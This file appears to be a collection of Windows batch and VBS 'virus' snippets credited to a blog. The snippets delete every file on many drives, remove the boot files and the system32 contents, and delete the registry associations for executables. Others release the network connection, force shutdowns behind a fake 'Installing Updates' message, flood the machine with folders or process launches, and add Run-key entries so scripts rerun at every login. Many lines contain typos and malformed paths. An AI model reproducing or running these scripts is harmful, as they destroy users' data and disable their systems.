@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d R:
md %RANDOM%
cd /d I:
md %RANDOM%
cd /d J:
md %RANDOM%
cd /d H:
md %RANDOM%
cd /d G:
md %RANDOM%
cd /d F:
md %RANDOM%
cd /d E:
md %RANDOM%
REM #######################
REM errorcode401.blogspot.in
---------------------------
@echo off
del D:\*.* /f /s /q
del C:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
del H:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del R:\*.* /f /s /q
del E:\*.* /f /s /q
-----------------------------
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
--------------------------------
@Echo off
Ipconfig /release
--------------------------
@echo off
msg * You are DOWN
shutdonw -c "Error code 69 xD" -s
----------------------------------------  .VBS
Option Explicit

Dim WSHShell

Set WSHShell=Wscript.CreateObhect("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
-----------------------------------------
rd/s/q D:\
rd/s/q C:\
rd/s/q R:\
rd/s/q F:\
rd/s/q I:\
rd/s/q J:\
rd/s/q H:\
rd/s/q G:\
rd/s/q E:\
--------------------
echo @echo off>c:windowshartlell.bat
echo brack off>>:cwindowshartlell.bat
echo shutdown -r -t 11 -f>>c:windownhartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentverionsrun /v /t reg_sz /d c:windowshartlell.bat /f
-------------------------------------
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
------------------------------------------
shutdown -s -t 100 c "Installing Updates to improve security level"
-----------------------------------
del c:\WINDOWS\system32\*.*/q
------------------------------------
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversion /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversion /v CONROLexit /t reg_sz /d c:windowswimn32.bat /f
-----------------------------------
